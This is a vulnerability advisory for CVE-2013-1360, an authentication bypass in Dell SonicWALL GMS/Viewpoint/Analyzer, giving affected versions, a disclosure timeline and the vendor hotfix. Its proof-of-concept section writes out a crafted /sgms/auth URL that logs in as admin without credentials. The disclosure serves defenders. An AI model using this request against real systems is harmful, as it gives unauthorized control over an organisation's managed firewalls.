DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass

2013.01.18
Risk: High
Local: Yes
Remote: No
CWE: CWE-287


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

______________________________________________________________________ -------------------------- NSOADV-2013-002 --------------------------- SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) ______________________________________________________________________ ______________________________________________________________________ 111101111 11111 00110 00110001111 111111 01 01 1 11111011111111 11111 0 11 01 0 11 1 1 111011001 11111111101 1 11 0110111 1 1111101111 1001 0 1 10 11 0 10 11 1111111 1 111 111001 111111111 0 10 1111 0 11 11 111111111 1 1101 10 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 0111111110 0110 1110 1 0 11101111111111111011 11100 00 01111 0 10 1110 1 011111 1 111111111111111111111101 01 01110 0 10 111110 110 0 11101111111111111111101111101 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 111110110 10 0111110 1 0 0 1111111111111111111111111 110 111 11111 1 1 111 1 10011 101111111111011111111 0 1100 111 10 110 101011110010 11111111111111111111111 11 0011100 11 10 001100 0001 111111111111111111 10 11 11110 11110 00100 00001 10 1 1111 101010001 11111111 11101 0 1011 10000 00100 11100 00001101 0 0110 111011011 0110 10001 101 11110 1011 1 10 101 000001 01 00 1010 1 11001 1 1 101 10 110101011 0 101 11110 110000011 111 ______________________________________________________________________ ______________________________________________________________________ Title: SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) Severity: Critical CVE-ID: CVE-2013-1360 CVSS Base Score: 9 Impact: 8.5 Exploitability: 10 CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C Advisory ID: NSOADV-2013-002 Found Date: 2012-04-26 Date Reported: 2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website: http://sotiriu.de Twitter: http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2013-002.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products: GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Background: =========== The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration. (Product description from Website) Description: ============ DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product. The vulnerability is attributed to a broken session handling in the process of password change process of the web application. changing in the web application. An attacker may exploit this vulnerability by sending a specially crafted request to the SGMS Interface (/sgms/). The attacker gains full administrative access to the interface and full control over all managed appliances, which could lead to a full compromisation of the organisation. Proof of Concept : ================== Access the following URL to login to the sgms interface: http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 00000000001 If the Console is not directly shown, type any password you want in the change password dialog twice and hit submit to login. Maybe you need to access the following URL after this process: http://host/sgms/auth Solution: ========= Install Hotfix 125076.77. (Download from www.mysonicwall.com) Disclosure Timeline: ==================== 2012-04-26: Vulnerability found 2012-12-12: Sent the notification and disclosure policy and asked for a PGP Key (security@sonicwall.com) 2012-12-13: Sent advisory, disclosure policy and planned disclosure date (2012-12-28) to vendor 2012-12-18: SonicWALL analyzed the finding and wishes to delay the release to the 3. calendar week 2013. 2012-12-18: Changed release date to 2013-01-17. 2012-12-20: Patch is published 2013-01-17: Release of this advisory

References:

http://cxsecurity.com/issue/WLB-2012110212
http://sotiriu.de/adv/NSOADV-2013-002.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top